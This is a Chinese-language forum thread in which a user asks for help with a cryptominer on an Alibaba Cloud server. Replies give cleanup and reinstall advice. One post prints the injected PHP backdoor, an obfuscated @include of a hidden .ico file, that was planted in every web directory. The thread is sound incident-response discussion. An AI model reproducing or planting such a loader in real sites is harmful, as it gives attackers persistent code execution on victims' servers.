V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
liuchang8877
V2EX  ›  问与答

阿里云 ECS 被挖矿程序跑满 CPU,在线求助

  •  
  •   liuchang8877 · 2019-01-30 10:22:46 +08:00 · 3961 次点击
    这是一个创建于 2160 天前的主题,其中的信息可能已经有所发展或是发生改变。

    实在没办法了,找了阿里云的技术支持还是搞不定,希望大家帮忙 看看 top 的占用

    PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    2162 www-data 20 0 44796 2628 468 S 51.8 0.3 1:02.34 xxq6862

    21 条回复    2019-01-31 09:49:08 +08:00
    CivAx
        1
    CivAx  
       2019-01-30 10:25:00 +08:00
    既然被跑满了,又能抓到 PID,为啥不直接 kill -9 ?
    liuchang8877
        2
    liuchang8877  
    OP
       2019-01-30 10:26:40 +08:00
    没用的,有定时任务应该,kill 掉后还是会重启
    已经从参考这个做了,还是不行,没找到它的定时任务

    https://blog.csdn.net/zzf1510711060/article/details/83015700
    ThirdFlame
        3
    ThirdFlame  
       2019-01-30 10:28:50 +08:00
    /etc/crontab 查看一下
    westoy
        4
    westoy  
       2019-01-30 10:28:50 +08:00   ❤️ 1
    先找个做安全的查查系统日志和程序日志, 看看是怎么被日的

    再把数据和程序备份下, 如果问题出在程序上, 修正之

    重做系统

    重新导入数据和安装程序

    不要试图现在这个系统修修补补继续用, 搞这个的都后多重后手防止被杀的, 你查二三重马的成本比重做高多了
    PureWhiteWu
        5
    PureWhiteWu  
       2019-01-30 10:30:02 +08:00
    直接重装系统啊。。。。
    egen
        6
    egen  
       2019-01-30 10:30:52 +08:00
    既然可以放个挖坑就不能顺手放个后门?清空重来吧,不然真过年了
    CivAx
        7
    CivAx  
       2019-01-30 10:31:27 +08:00
    @liuchang8877 #2 要不你给一下登录信息我帮你上去看看吧……(正好摸鱼
    AstroProfundis
        8
    AstroProfundis  
       2019-01-30 10:33:29 +08:00   ❤️ 1
    备份数据
    开一台新的 ecs
    部署干净环境
    改强密码 /证书登录&检查应用的安全漏洞
    导入备份的数据
    改访问(域名、ip 之类)地址
    旧 ecs 关机,观察没问题之后销毁旧 ecs
    zhoulouzi
        9
    zhoulouzi  
       2019-01-30 10:34:41 +08:00
    不清楚 Aliyun ECS 怎么跑的, 但是类似之前 kubernetes 有一个 CVE-2018-1002105 的 API 安全漏洞,也是会被远程攻击,在容器里跑挖矿程序, 你可以相同思路看看你的 docker 的 API 是不是未授权就暴露出来了
    liuchang8877
        10
    liuchang8877  
    OP
       2019-01-30 10:39:37 +08:00
    哎,不想清空从来呀就是,成本有点高,三套程序,加上 https 证书什么的,一弄就是一天,阿里云上都做了快照,数据再备份下,郁闷。
    liuchang8877
        11
    liuchang8877  
    OP
       2019-01-30 10:46:12 +08:00
    这是什么玩法?每个目录下给我塞了一个 index.php 文件,引入了一个远程库?

    <?php
    /*fb6ae*/

    @include "\057var\057www\057htm\154/mo\144ule\163/im\141ge/\164est\163/.2\066a24\067ab.\151co";

    /*fb6ae*/
    msg7086
        12
    msg7086  
       2019-01-30 10:47:44 +08:00
    备份数据重装不就得了。清理病毒什么的就不要多想了……
    liuchang8877
        13
    liuchang8877  
    OP
       2019-01-30 10:49:15 +08:00
    只能重装了,奋战....
    goodryb
        14
    goodryb  
       2019-01-30 12:17:40 +08:00
    如果由之前的快照,直接回滚之前的快照即可。
    如果之前没有快照,建议对现在系统做手动快照。完成后重置系统,然后部署基础环境,挂载前面创建的快照,把数据拷贝过去。

    快照是个好东西,一定要开起来
    ccc008
        15
    ccc008  
       2019-01-30 12:37:50 +08:00
    @liuchang8877 #10 你慢慢分析查杀病毒。1 天都搞不定的。
    cpdyj0
        16
    cpdyj0  
       2019-01-30 12:44:09 +08:00 via Android
    备份文件,重装系统…最简单粗暴但却有效的办法…
    DANG
        17
    DANG  
       2019-01-30 12:49:53 +08:00
    proc 下根据 pid 找文件路径删文件杀进程
    crontab 里看定时任务里有没有脚本网址,有的话下载下来看看都干啥了。然后删除任务。
    这种攻击都是服务器有漏洞导致的,建议关闭类似 8088 这样的危险端口。最主要的还是找到计划任务的那个脚本
    yuikns
        18
    yuikns  
       2019-01-30 12:49:56 +08:00
    人家不仅能装 crontab,还能给你装各种启动和后台,还能篡改你的系统命令。

    还是重装吧。
    jay4497
        19
    jay4497  
       2019-01-30 13:53:28 +08:00   ❤️ 1
    liuchang8877
        20
    liuchang8877  
    OP
       2019-01-30 13:58:02 +08:00
    @jay4497
    多谢,我给这个也删了试试
    RubyJack
        21
    RubyJack  
       2019-01-31 09:49:08 +08:00
    根除或者 cgroup 限制
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2737 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 12:17 · PVG 20:17 · LAX 04:17 · JFK 07:17
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.